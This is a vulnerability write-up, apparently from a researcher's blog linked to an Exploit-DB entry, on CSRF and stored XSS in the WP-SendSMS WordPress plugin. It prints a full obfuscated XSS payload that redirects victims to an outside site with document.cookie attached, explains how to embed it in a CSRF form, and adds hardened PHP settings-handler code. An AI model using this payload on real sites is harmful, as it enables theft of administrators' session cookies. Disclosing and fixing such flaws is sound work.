WordPress WP-SendSMS plugin 1.0 suffers from CSRF and Stored XSS vulnerabilities.
The interesting part is the Stored XSS + CSRF combination: an attacker can exploit the CSRF vulnerability to trigger the Stored XSS and steal cookies.
So what I did here is craft a simple CSRF exploit page with a Stored XSS payload, as below:
Challenges:
1. Stored XSS was there, but it was not possible to use things like document.cookie, alert() etc.
2. Storing the XSS payload inside our CSRF exploit HTML page.
To bypass the 1st challenge I had to use the function String.fromCharCode(ascii value), and the payload looks like:
"><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>
The above payload will redirect the victim to my website with the cookies attached to the URL.
But when we put this payload inside value="XSS PAYLOAD" it will not work, because it is interpreted as value=""><script>........ which actually sets your value="" instead of the XSS payload. To bypass this we can put &quot; (the HTML entity for a double quote) instead of ", and this will be considered a valid XSS payload inside your CSRF exploit form.
For the exploit please check: exploit-db
Stored XSS Details :
URL:
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms
Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
5. captcha_characters
Vulnerability POC (screenshot): cookies are redirected to the attacker's website.
This is how Stored XSS can be exploited through CSRF, which makes for an effective attack. This is just for information purposes.
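Added example (not the plugin's own code): a WordPress settings handler hardened against both issues described above. The option key, nonce action and hook names are hypothetical; the field names are the five parameters listed above. The nonce plus capability check defeats the CSRF page, and escaping on output replaces keyword filtering, so there is nothing left for String.fromCharCode to bypass.

```php
<?php
// Added example, not WP-SendSMS code. Option key, nonce action and hook
// names are hypothetical; field names mirror the five vulnerable parameters.
add_action( 'admin_post_sendsms_save', 'sendsms_save_settings' );

function sendsms_save_settings() {
    // CSRF: a cross-site form cannot read the per-user nonce, so a forged
    // request dies here before any option is written.
    check_admin_referer( 'sendsms_save_settings', 'sendsms_nonce' );
    // Authorization: only users who may manage options can change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $settings = array(
        // Free text: strip tags/control chars, but do not blacklist words like
        // "document.cookie"; the real protection is encoding on output.
        'sender_id'          => sanitize_text_field( wp_unslash( $_POST['sender_id'] ?? '' ) ),
        // Numeric settings: coerce to non-negative integers so markup cannot be stored.
        'maximum_characters' => absint( $_POST['maximum_characters'] ?? 0 ),
        'captcha_width'      => absint( $_POST['captcha_width'] ?? 0 ),
        'captcha_height'     => absint( $_POST['captcha_height'] ?? 0 ),
        'captcha_characters' => absint( $_POST['captcha_characters'] ?? 0 ),
    );
    update_option( 'sendsms_settings', $settings );
    wp_safe_redirect( admin_url( 'admin.php?page=sms&updated=1' ) );
    exit;
}

function sendsms_render_settings_form() {
    $s = get_option( 'sendsms_settings', array() );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <?php wp_nonce_field( 'sendsms_save_settings', 'sendsms_nonce' ); ?>
        <input type="hidden" name="action" value="sendsms_save">
        <?php
        // Attribute context: esc_attr() turns " into &quot;, so a stored
        // "><script> can never close the value attribute and start a tag.
        foreach ( array( 'sender_id', 'maximum_characters', 'captcha_width',
                         'captcha_height', 'captcha_characters' ) as $name ) :
        ?>
        <label><?php echo esc_html( $name ); ?>
            <input type="text" name="<?php echo esc_attr( $name ); ?>"
                   value="<?php echo esc_attr( $s[ $name ] ?? '' ); ?>">
        </label><br>
        <?php endforeach; ?>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}
```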
Published on Exploit-db
EDB-ID:26124
Are you sure you are a security researcher?! You do not even know how to explain a simple flaw!